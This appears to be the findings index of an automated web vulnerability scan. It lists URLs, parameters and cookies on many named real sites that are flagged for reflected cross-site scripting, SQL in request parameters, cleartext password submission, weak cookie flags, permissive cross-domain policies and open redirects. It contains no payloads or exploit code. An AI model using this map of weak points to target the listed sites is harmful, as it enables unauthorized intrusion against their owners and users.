1.1. https://secure.trust-guard.com/ [__utmb cookie]
1.2. https://secure.trust-guard.com/ [__utmc cookie]
1.3. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]
1.4. https://secure.trust-guard.com/index.php [__utma cookie]
1.5. https://secure.trust-guard.com/index.php [__utmz cookie]
1.6. http://www.hunton.com/aboutus/uniGC.aspx [BIGipServerH1-HUNTON-A0910-80 cookie]
2.2. http://apps.sapha.com/appshandler.php [ac parameter]
2.3. http://dce.sapha.com/engine.php [ac parameter]
2.4. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]
2.5. http://dce.sapha.com/logging.php [ac parameter]
2.6. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s96203847790602 [REST URL parameter 1]
2.7. http://om.expedia.com/b/ss/expedia1/1/H.9-Pdvu-2/s9923706686589 [REST URL parameter 1]
2.8. http://poll.websitegear.com/compactpoll.asp [pollID parameter]
2.9. https://secure.trust-guard.com/ [__utmb cookie]
2.10. https://secure.trust-guard.com/ [name of an arbitrarily supplied request parameter]
2.11. https://secure.trust-guard.com/ResetPassword.php [Referer HTTP header]
2.12. https://secure.trust-guard.com/ResetPassword.php [User-Agent HTTP header]
2.14. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]
2.15. https://secure.trust-guard.com/index.php [__utmb cookie]
2.16. https://secure.trust-guard.com/index.php [__utmz cookie]
2.17. https://secure.trust-guard.com/index.php [name of an arbitrarily supplied request parameter]
2.18. https://subscribe.haymarketmedia.com/scm/ [form parameter]
2.19. http://tours.sapha.com/ [scs_sid parameter]
2.20. http://tours.sapha.com/ [scs_sid parameter]
2.21. http://tours.sapha.com/ [scs_tid parameter]
2.22. http://tours.sapha.com/ [scs_tid parameter]
2.23. http://www.brownrudnick.com/nr/alertsArchv.asp [Year parameter]
2.24. http://www.caribbean-ocean.com/accommodation2.php [id parameter]
2.26. http://www.caribbean-ocean.com/get-image.php [id parameter]
2.28. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]
2.29. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]
2.30. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [REST URL parameter 3]
2.31. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [s_sq cookie]
2.32. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]
2.33. http://www.dominionenterprises.com/main/do/Careers [Referer HTTP header]
2.34. http://www.dominionenterprises.com/main/do/Careers [s_cc cookie]
2.35. http://www.dominionenterprises.com/main/do/For_Businesses [REST URL parameter 3]
2.37. http://www.expedia.com/daily/common/moreinfo.asp [trl parameter]
2.38. http://www.expedia.com/pub/agent.dll [rged parameter]
2.39. http://www.expedia.com/pub/agent.dll [rgst parameter]
2.40. http://www.expedia.com/pubspec/scripts/eap.asp [TripLength parameter]
2.41. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [CurrentZone cookie]
2.42. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [js parameter]
2.43. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [jv parameter]
2.44. http://www.hunton.com/aboutus/uniGC.aspx [EventingStatus cookie]
2.45. http://www.hunton.com/professionals/uniGC.aspx [EventingStatus cookie]
2.46. http://www.hunton.com/professionals/uniGC.aspx [ZoneId cookie]
2.47. http://www.hunton.com/professionals/uniGC.aspx [__utma cookie]
2.48. http://www.millerwelds.com/favicon.ico [REST URL parameter 1]
2.49. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 1]
2.50. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 2]
2.51. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 3]
2.53. http://www.millerwelds.com/financing/index.php [REST URL parameter 1]
2.54. http://www.millerwelds.com/financing/index.php [REST URL parameter 2]
2.56. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]
2.57. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2]
2.58. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]
2.59. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2]
2.60. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]
2.61. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2]
2.62. http://www.nutter.com/attorneys.php [AttorneyID parameter]
2.63. http://www.nutter.com/careers.php [CareerID parameter]
2.64. http://www.nutter.com/careers.php [CategoryID parameter]
2.65. http://www.socialfollow.com/button/image/ [b parameter]
3.1. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]
3.2. http://www.hunton.com/professionals/uniGC.aspx [LastName parameter]
4.1. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [REST URL parameter 1]
4.2. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other [REST URL parameter 1]
4.3. http://bidder.mathtag.com/iframe/notify [exch parameter]
4.4. http://d.xp1.ru4.com/activity [redirect parameter]
4.5. http://learn.bridgefront.com/sendpassword [replace0_ul_ parameter]
5. Cross-site scripting (reflected)
5.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]
5.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]
5.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]
5.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]
5.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]
5.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]
5.8. http://480-adver-view.c3metrics.com/v.js [id parameter]
5.9. http://480-adver-view.c3metrics.com/v.js [t parameter]
5.10. http://ad.adlegend.com/jscript [@CPSC@ parameter]
5.11. http://ad.adlegend.com/jscript [name of an arbitrarily supplied request parameter]
5.12. http://ad.adlegend.com/jscript [target parameter]
5.13. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [adurl parameter]
5.14. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [ai parameter]
5.15. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [client parameter]
5.16. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [num parameter]
5.17. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sig parameter]
5.18. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sig parameter]
5.19. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sz parameter]
5.20. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [sz parameter]
5.21. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
5.22. http://adsfac.us/ag.asp [cc parameter]
5.23. http://apps.sapha.com/appshandler.php [ac parameter]
5.24. http://apps.sapha.com/appshandler.php [ac parameter]
5.25. http://b.scorecardresearch.com/beacon.js [c1 parameter]
5.26. http://b.scorecardresearch.com/beacon.js [c10 parameter]
5.27. http://b.scorecardresearch.com/beacon.js [c15 parameter]
5.28. http://b.scorecardresearch.com/beacon.js [c2 parameter]
5.29. http://b.scorecardresearch.com/beacon.js [c3 parameter]
5.30. http://b.scorecardresearch.com/beacon.js [c4 parameter]
5.31. http://b.scorecardresearch.com/beacon.js [c5 parameter]
5.32. http://b.scorecardresearch.com/beacon.js [c6 parameter]
5.33. http://bid.openx.net/json [c parameter]
5.34. https://broker.gotoassist.com/h/lbmc [CompanyName parameter]
5.35. http://dce.sapha.com/engine.php [ac parameter]
5.36. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]
5.37. http://depot.activalive.com/app/deployment.php [d[] parameter]
5.38. http://dinclinx.com/ [name of an arbitrarily supplied request parameter]
5.39. http://image.providesupport.com/cmd/advancedaccess [REST URL parameter 1]
5.40. http://image.providesupport.com/js/advancedaccess/safe-monitor.js [REST URL parameter 1]
5.41. http://image.providesupport.com/js/advancedaccess/safe-monitor.js [REST URL parameter 2]
5.50. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]
5.51. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpck parameter]
5.52. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]
5.53. http://img.mediaplex.com/content/0/16228/124632/300x250_Patch.js [mpvc parameter]
5.54. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]
5.55. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpck parameter]
5.56. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]
5.57. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js [mpvc parameter]
5.59. http://iv.doubleclick.net/adi/nbcu.lim.har/news-local-article [!category parameter]
5.60. http://iv.doubleclick.net/adi/nbcu.lim.har/pid_ap_news-politics-article [!category parameter]
5.61. http://iv.doubleclick.net/adj/nbcu.lim.har/hp-index [!category parameter]
5.62. http://iv.doubleclick.net/adj/nbcu.lim.har/news-local-article [!category parameter]
5.63. http://iv.doubleclick.net/adj/nbcu.lim.har/pid_ap_news-politics-article [!category parameter]
5.64. http://jlinks.industrybrains.com/jsct [ct parameter]
5.65. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]
5.66. http://js.revsci.net/gateway/gw.js [csid parameter]
5.68. http://kroogy.com/a [REST URL parameter 1]
5.69. http://kroogy.com/favicon.ico [REST URL parameter 1]
5.70. http://kroogy.com/pub/banner_160_600.php [REST URL parameter 1]
5.71. http://kroogy.com/pub/banner_728_90.php [REST URL parameter 1]
5.72. http://kroogy.com/pub/banner_728_90_random.php [REST URL parameter 1]
5.74. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS [REST URL parameter 1]
5.75. http://kroogy.com/search/web/Linkbucks%20vlad%20modelS [REST URL parameter 2]
5.81. http://learn.bridgefront.com/sendpassword [button1 parameter]
5.82. http://learn.bridgefront.com/sendpassword [button2 parameter]
5.83. http://learn.bridgefront.com/sendpassword [forgetbrand parameter]
5.84. http://learn.bridgefront.com/sendpassword [forwardpage parameter]
5.85. http://learn.bridgefront.com/sendpassword [name of an arbitrarily supplied request parameter]
5.86. http://learn.bridgefront.com/sendpassword [replace0_ul_ parameter]
5.87. http://learn.bridgefront.com/sendpassword [replace1_ul_ parameter]
5.88. http://learn.bridgefront.com/sendpassword [totalvalues parameter]
5.89. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp [message parameter]
5.90. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp [message parameter]
5.91. http://login.vindicosuite.com/default.asp [message parameter]
5.92. http://login.vindicosuite.com/default.asp [message parameter]
5.94. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]
5.95. https://secure.trust-guard.com/index.php [txtEmail parameter]
5.96. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]
5.97. http://store.kentuckyderby.com/cart.php [rs parameter]
5.98. https://subscribe.haymarketmedia.com/scm/ [form parameter]
5.100. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]
5.101. http://tours.sapha.com/ [name of an arbitrarily supplied request parameter]
5.102. http://tours.sapha.com/ [scs_sid parameter]
5.103. http://tours.sapha.com/ [scs_tid parameter]
5.104. https://verify.authorize.net/anetseal/ [rurl parameter]
5.105. http://widgets.digg.com/buttons/count [url parameter]
5.106. http://www.advisorsquare.com/useradmin/Authenticate.asp [ComeBack parameter]
5.107. http://www.advisorsquare.com/useradmin/Authenticate.asp [GroupId parameter]
5.108. http://www.advisorsquare.com/useradmin/Authenticate.asp [GroupId parameter]
5.109. http://www.brownrudnick.com/nr/alertsArchv.asp [Year parameter]
5.110. http://www.brownrudnick.com/nr/articlesindv.asp [ID parameter]
5.111. http://www.caribbean-ocean.com/accommodation2.php [id parameter]
5.113. http://www.caribbean-ocean.com/get-image.php [id parameter]
5.117. http://www.dhmiservices.com/ClickContact/js.ashx [img parameter]
5.118. http://www.dhmiservices.com/ImageHandler.ashx [img_id parameter]
5.121. http://www.expedia.com/pub/agent.dll [date1 parameter]
5.122. https://www.expedia.com/pub/agent.dll [selc parameter]
5.123. http://www.ezflexplan.com/navigation/frameset.asp [content parameter]
5.124. http://www.ezflexplan.com/navigation/frameset.asp [email parameter]
5.125. http://www.ezflexplan.com/navigation/frameset.asp [id parameter]
5.126. http://www.ezflexplan.com/navigation/menu.asp [id parameter]
5.129. http://www.hunton.com/aboutus/uniGC.aspx [name of an arbitrarily supplied request parameter]
5.130. http://www.hunton.com/alan_kailer/ [name of an arbitrarily supplied request parameter]
5.133. http://www.hunton.com/news/uniGC.aspx [name of an arbitrarily supplied request parameter]
5.134. http://www.hunton.com/news/uniGC.aspx [nsextt parameter]
5.136. http://www.hunton.com/professionals/uniGC.aspx [LastName parameter]
5.138. http://www.hunton.com/services/uniGC.aspx [name of an arbitrarily supplied request parameter]
5.139. http://www.hunton.com/sitemap/uniGC.aspx [name of an arbitrarily supplied request parameter]
5.140. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 1]
5.141. http://www.millerwelds.com/financing/index.php [REST URL parameter 1]
5.142. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]
5.143. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]
5.144. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]
5.145. http://www.nextadvisor.com/favicon.ico [REST URL parameter 1]
5.146. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]
5.147. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]
5.148. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 2]
5.149. http://www.nutter.com/attorneys.php [AttorneyID parameter]
5.150. http://www.nutter.com/careers.php [CareerID parameter]
5.151. http://www.nutter.com/careers.php [CategoryID parameter]
5.152. http://www.socialfollow.com/button/ [b parameter]
5.153. http://www.socialfollow.com/button/ [b parameter]
5.154. http://www.socialfollow.com/button/css/ [b parameter]
5.155. http://www.socialfollow.com/button/css/ [socialSites parameter]
5.156. http://www.socialfollow.com/login.php [tEmail parameter]
5.157. http://www.tagged.com/api/ [data parameter]
5.158. http://www.tagged.com/api/ [data parameter]
5.159. https://www.taxnotebook.com/Login/PopupMessage.aspx [usr parameter]
5.160. http://www.twinspiresclub.com/members/join [REST URL parameter 2]
5.162. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]
5.163. http://apps.sapha.com/appshandler.php [sapha_1_19 cookie]
5.164. http://apps.sapha.com/appshandler.php [sapha_2546_1 cookie]
5.165. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
5.166. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]
5.167. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]
5.168. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]
5.169. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]
5.170. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]
5.171. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]
5.172. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]
5.173. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]
5.174. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]
5.175. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]
5.176. http://hmficweb.hinghammutual.com/billing_view/billingview.asp [HinghamLoginError cookie]
5.177. http://hmficweb.hinghammutual.com/billing_view/billingview.asp [HinghamLoginError cookie]
5.178. http://hmficweb.hinghammutual.com/billing_view/login.asp [HinghamLoginError cookie]
5.179. https://myaccount.nytimes.com/gst/forgot [RMID cookie]
5.180. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie]
5.181. http://support.expedia.com/app/answers/list/ [MC1 cookie]
5.183. http://www.expedia.com/default.asp [MC1 cookie]
6.1. http://a.collective-media.net/crossdomain.xml
6.2. http://action.mathtag.com/crossdomain.xml
6.3. http://ad.doubleclick.net/crossdomain.xml
6.4. http://adsfac.us/crossdomain.xml
6.5. http://altfarm.mediaplex.com/crossdomain.xml
6.6. http://api.facebook.com/crossdomain.xml
6.7. http://apps.sapha.com/crossdomain.xml
6.8. http://ar.voicefive.com/crossdomain.xml
6.9. http://as.casalemedia.com/crossdomain.xml
6.10. http://b.rad.msn.com/crossdomain.xml
6.11. http://b.voicefive.com/crossdomain.xml
6.12. http://bh.contextweb.com/crossdomain.xml
6.13. http://c.scout.com/crossdomain.xml
6.14. http://c5.zedo.com/crossdomain.xml
6.15. http://c7.zedo.com/crossdomain.xml
6.16. http://cdn.eyewonder.com/crossdomain.xml
6.17. http://cdn.gigya.com/crossdomain.xml
6.18. http://cu1.activalive.com/crossdomain.xml
6.19. http://d.xp1.ru4.com/crossdomain.xml
6.20. http://depot.activalive.com/crossdomain.xml
6.21. http://fls.doubleclick.net/crossdomain.xml
6.22. http://haymarketbusinesspublications.122.2o7.net/crossdomain.xml
6.23. http://ib.adnxs.com/crossdomain.xml
6.24. http://img.mediaplex.com/crossdomain.xml
6.25. http://int.teracent.net/crossdomain.xml
6.26. http://m.adnxs.com/crossdomain.xml
6.27. http://media.fastclick.net/crossdomain.xml
6.28. http://microsoftsto.112.2o7.net/crossdomain.xml
6.29. http://nba.scout.com/crossdomain.xml
6.30. http://ne.wac.edgecastcdn.net/crossdomain.xml
6.31. http://now.eloqua.com/crossdomain.xml
6.32. http://om.expedia.com/crossdomain.xml
6.33. http://p.addthis.com/crossdomain.xml
6.34. http://pix04.revsci.net/crossdomain.xml
6.35. http://search.twitter.com/crossdomain.xml
6.36. http://secure-us.imrworldwide.com/crossdomain.xml
6.37. http://segment-pixel.invitemedia.com/crossdomain.xml
6.38. http://tags.bluekai.com/crossdomain.xml
6.39. http://tours.sapha.com/crossdomain.xml
6.40. http://va.px.invitemedia.com/crossdomain.xml
6.41. http://www2.sesamestats.com/crossdomain.xml
6.42. http://edge.sharethis.com/crossdomain.xml
6.43. http://expedia.com/crossdomain.xml
6.44. http://googleads.g.doubleclick.net/crossdomain.xml
6.45. http://player.ooyala.com/crossdomain.xml
6.46. http://www.expedia.com/crossdomain.xml
6.47. https://www.expedia.com/crossdomain.xml
6.48. http://www.tagged.com/crossdomain.xml
6.49. http://extras.expedia.com/crossdomain.xml
7. Silverlight cross-domain policy
7.1. http://ad.doubleclick.net/clientaccesspolicy.xml
7.2. http://b.rad.msn.com/clientaccesspolicy.xml
7.3. http://b.voicefive.com/clientaccesspolicy.xml
7.4. http://c.scout.com/clientaccesspolicy.xml
7.5. http://cdn.eyewonder.com/clientaccesspolicy.xml
7.6. http://haymarketbusinesspublications.122.2o7.net/clientaccesspolicy.xml
7.7. http://microsoftsto.112.2o7.net/clientaccesspolicy.xml
7.8. http://om.expedia.com/clientaccesspolicy.xml
7.9. http://player.ooyala.com/clientaccesspolicy.xml
7.10. http://secure-us.imrworldwide.com/clientaccesspolicy.xml
7.11. http://www.gofileroom.com/clientaccesspolicy.xml
7.12. https://www.gofileroom.com/clientaccesspolicy.xml
8. Cleartext submission of password
8.1. http://hmficweb.hinghammutual.com/reglogin.aspx
8.2. http://login.vindicosuite.com/
8.3. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
8.4. http://login.vindicosuite.com/default.asp
8.5. http://www.advisorsquare.com/useradmin/Authenticate.asp
8.6. http://www.alumniconnections.com/alumni_members/mylisting/index.html
8.7. http://www.eneighborhoods.com/login_form.asp
8.8. http://www.gofileroom.com/lbmc/
8.9. http://www.horseracingnation.com/polls/current/kentucky_derby_2011_contenders
8.10. http://www.horseracingnation.com/probables/probables.aspx
8.11. http://www.lbmc.com/user
8.12. http://www.nbcconnecticut.com/
8.13. http://www.nbcconnecticut.com/
8.20. http://www.resiteonline.com/
8.21. http://www.socialfollow.com/
8.22. http://www.socialfollow.com/
8.23. http://www.socialfollow.com/blog/
8.24. http://www.socialfollow.com/login.php
8.25. http://www.socialfollow.com/login.php
8.26. http://www.twinspiresclub.com/members/join
9.1. http://api.facebook.com/restserver.php [format parameter]
9.2. http://hmficweb.hinghammutual.com/abouthingham/Default.aspx [ASP.NET_SessionId cookie]
9.3. http://www.expedia.com/daily/common/moreinfo.asp [mon parameter]
9.4. http://www.expedia.com/pub/agent.dll [hfnm parameter]
9.5. https://www.expedia.com/pub/agent.dll [COOKIECHECK cookie]
9.6. https://www.expedia.com/pub/agent.dll [JSESSION cookie]
9.7. https://www.expedia.com/pub/agent.dll [MC1 cookie]
9.8. https://www.expedia.com/pub/agent.dll [U9Z5 cookie]
9.9. https://www.expedia.com/pub/agent.dll [aspp cookie]
9.10. https://www.expedia.com/pub/agent.dll [bn_u cookie]
9.11. https://www.expedia.com/pub/agent.dll [hfnm parameter]
9.12. https://www.expedia.com/pub/agent.dll [iEAPID cookie]
9.13. https://www.expedia.com/pub/agent.dll [ipsnf3 cookie]
9.14. https://www.expedia.com/pub/agent.dll [jscript cookie]
9.15. https://www.expedia.com/pub/agent.dll [p1 cookie]
9.16. https://www.expedia.com/pub/agent.dll [s1 cookie]
9.17. https://www.expedia.com/pub/agent.dll [s_sess cookie]
9.18. https://www.expedia.com/pub/agent.dll [s_vi cookie]
9.19. https://www.expedia.com/pub/agent.dll [srvys cookie]
10. Password returned in later response
10.1. http://www.socialfollow.com/
10.2. http://www.socialfollow.com/blog/
11. SQL statement in request parameter
11.1. http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp
11.2. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
11.3. http://login.vindicosuite.com/default.asp
11.4. http://login.vindicosuite.com/vindico_dynamic.asp
11.5. https://secure.trust-guard.com/ResetPassword.php
11.6. https://secure.trust-guard.com/index.php
11.7. http://www.caribbean-ocean.com/get-image.php
11.8. http://www.socialfollow.com/button/image/
12. SSL cookie without secure flag set
12.1. https://broker.gotoassist.com/h/lbmc
12.2. https://secure.trust-guard.com/
12.3. https://secure.trust-guard.com/ResetPassword.php
12.4. https://secure.trust-guard.com/index.php
12.5. https://subscribe.haymarketmedia.com/scm/
12.6. https://www.taxnotebook.com/Login/PopupMessage.aspx
12.7. https://www.taxnotebook.com/Login/TNLogin.aspx
12.8. https://www.taxnotebook.com/tnstart.asp
12.9. https://meter-svc.nytimes.com/meter.js
12.10. https://www.expedia.com/pub/agent.dll
12.11. https://www.gofileroom.com/lbmc
13.1. http://ads.adonion.com/serving/showbanner.php
13.2. http://bh.contextweb.com/bh/set.aspx
13.3. https://broker.gotoassist.com/ds/queryPost.flow
13.4. https://broker.gotoassist.com/javaScriptTester.tmpl
13.5. http://fls.doubleclick.net/activityi
13.6. http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/ps/ifr
13.7. http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/ps/ifr
13.8. http://l.sharethis.com/pview
13.9. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/ps/ifr
13.10. http://sales.liveperson.net/hc/56727252/
13.11. http://www.tagged.com/api/
14. ASP.NET ViewState without MAC enabled
14.2. https://subscribe.haymarketmedia.com/scm/
14.3. https://subscribe.haymarketmedia.com/subscribe/CCI_Custserve.aspx
14.4. https://www.taxnotebook.com/Login/ChangePwd.aspx
14.5. https://www.taxnotebook.com/Login/PopupMessage.aspx
14.6. https://www.taxnotebook.com/Login/TNLogin.aspx
15.1. http://a.triggit.com/pxbk [redir parameter]
15.2. http://b.scorecardresearch.com/r [d.c parameter]
15.3. http://d.xp1.ru4.com/activity [redirect parameter]
16. Cookie scoped to parent domain
16.1. http://api.twitter.com/1/statuses/user_timeline.json
16.2. http://www.expedia.com/Hotels
16.3. http://www.lbmc.com/about_us
16.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
16.5. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp
16.6. http://ad.adlegend.com/jscript
16.7. http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5
16.8. http://adfarm.mediaplex.com/ad/js/15368-110724-22624-68
16.9. http://adopt.imiclk.com/emb/q
16.10. http://ads.adonion.com/serving/tracking_id.php
16.11. http://ads.revsci.net/adserver/ako
16.12. http://ads.revsci.net/adserver/ako
16.13. http://ak1.abmr.net/is/media.expedia.com
16.14. http://altfarm.mediaplex.com/ad/js/16228-124632-16454-0
16.15. http://ar.voicefive.com/b/wc_beacon.pli
16.16. http://ar.voicefive.com/bmx3/broker.pli
16.17. http://as.casalemedia.com/j
16.18. http://b.scorecardresearch.com/b
16.19. http://b.scorecardresearch.com/r
16.20. http://b.voicefive.com/b
16.21. http://bh.contextweb.com/bh/set.aspx
16.22. http://bid.openx.net/json
16.23. http://bidder.mathtag.com/iframe/notify
16.24. http://c7.zedo.com/bar/v16-406/c5/jsc/gl.js
16.25. http://cf.addthis.com/red/p.json
16.26. http://dce.sapha.com/logging.php
16.27. http://dce.sapha.com/logging.php
16.28. http://ib.adnxs.com/getuidnb
16.29. http://ib.adnxs.com/pxj
16.30. http://ib.adnxs.com/seg
16.31. http://id.google.com/verify/EAAAADcwJcMJLjnWquVxOtkmYRg.gif
16.32. http://id.google.com/verify/EAAAAG_sa57vRYQmlm0gFHNkdu4.gif
16.33. http://id.google.com/verify/EAAAANTvF5afxBqT02sP1JEM_fQ.gif
16.34. http://id.google.com/verify/EAAAAOVhf5VMyylQCd7Y4m9Qwq4.gif
16.35. http://image.providesupport.com/js/advancedaccess/safe-monitor.js
16.36. http://image.providesupport.com/js/charlesw/safe-standard.js
16.37. http://int.teracent.net/tase/int
16.38. http://leadback.advertising.com/adcedge/lb
16.39. http://m.adnxs.com/msftcookiehandler
16.40. http://media.expedia.com/media/content/expus/graphics/home/wiz/wizard_booking_image.gif
16.42. http://media.fastclick.net/w/tre
16.43. http://meter-svc.nytimes.com/meter.js
16.44. https://meter-svc.nytimes.com/meter.js
16.46. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s91449721802491
16.47. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif
16.48. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif
16.49. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif
16.50. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif
16.51. http://pix04.revsci.net/I10985/b3/0/3/1003161/1437265.js
16.52. http://pix04.revsci.net/I10985/b3/0/3/1003161/696734288.js
16.53. http://segment-pixel.invitemedia.com/pixel
16.54. http://syndication.mmismm.com/mmtnt.php
16.55. http://tags.bluekai.com/site/2576
16.56. http://tags.bluekai.com/site/2751
16.57. http://tags.bluekai.com/site/2753
16.58. http://tags.bluekai.com/site/2948
16.59. http://tags.bluekai.com/site/38
16.60. http://tags.bluekai.com/site/450
16.61. http://va.px.invitemedia.com/pixel
16.62. http://www.expedia.com/default.asp
16.63. http://www.expedia.com/pub/agent.dll
16.64. https://www.expedia.com/pub/agent.dll
17. Cookie without HttpOnly flag set
17.1. https://broker.gotoassist.com/h/lbmc
17.2. http://dominionenterprises.com/
17.3. http://hmficweb.hinghammutual.com/billing_view/
17.4. http://hmficweb.hinghammutual.com/billing_view/billingview.asp
17.5. http://learn.bridgefront.com/sendpassword
17.6. http://login.vindicosuite.com/
17.7. http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp
17.8. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
17.9. http://login.vindicosuite.com/default.asp
17.10. http://login.vindicosuite.com/vindico_dynamic.asp
17.11. http://poll.websitegear.com/compactpoll.asp
17.12. http://poll.websitegear.com/compactpoll.asp
17.13. http://sales.liveperson.net/visitor/addons/deploy.asp
17.14. https://secure.trust-guard.com/
17.15. https://secure.trust-guard.com/ResetPassword.php
17.16. https://secure.trust-guard.com/index.php
17.17. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
17.18. http://support.expedia.com/app/answers/list/
17.20. http://support.expedia.com/ci/ajaxRequest/getReportData
17.21. http://www.advisorsquare.com/advdev/calculators/content.asp
17.22. http://www.advisorsquare.com/design_gallery/Flash/BB12_bg.gif
17.23. http://www.advisorsquare.com/design_gallery/Flash/BU13Flash_banner_background.gif
17.24. http://www.advisorsquare.com/design_gallery/Flash/BU14Flash_banner_background.gif
17.25. http://www.advisorsquare.com/design_gallery/Flash/BUP18Flash_banner_background.gif
17.26. http://www.advisorsquare.com/design_gallery/Flash/CS15Flash_banner_background.gif
17.27. http://www.advisorsquare.com/design_gallery/Flash/CS18_bg.gif
17.28. http://www.advisorsquare.com/design_gallery/Flash/CS20_bg.gif
17.29. http://www.advisorsquare.com/design_gallery/Flash/GA14_bg.gif
17.30. http://www.advisorsquare.com/design_gallery/Flash/GA15_bg.gif
17.31. http://www.advisorsquare.com/design_gallery/Flash/NL12_bg.gif
17.32. http://www.advisorsquare.com/design_gallery/fsplash/background.gif
17.33. http://www.advisorsquare.com/design_gallery/limited/SE3_background.gif
17.34. http://www.advisorsquare.com/design_gallery/welcome/grayStripe.gif
17.35. http://www.advisorsquare.com/design_gallery/welcome/transpx.gif
17.36. http://www.advisorsquare.com/images/business.gif
17.37. http://www.advisorsquare.com/images/business_over.gif
17.38. http://www.advisorsquare.com/images/individual.gif
17.39. http://www.advisorsquare.com/images/individual_over.gif
17.40. http://www.advisorsquare.com/images/view1.gif
17.41. http://www.advisorsquare.com/images/view_over1.gif
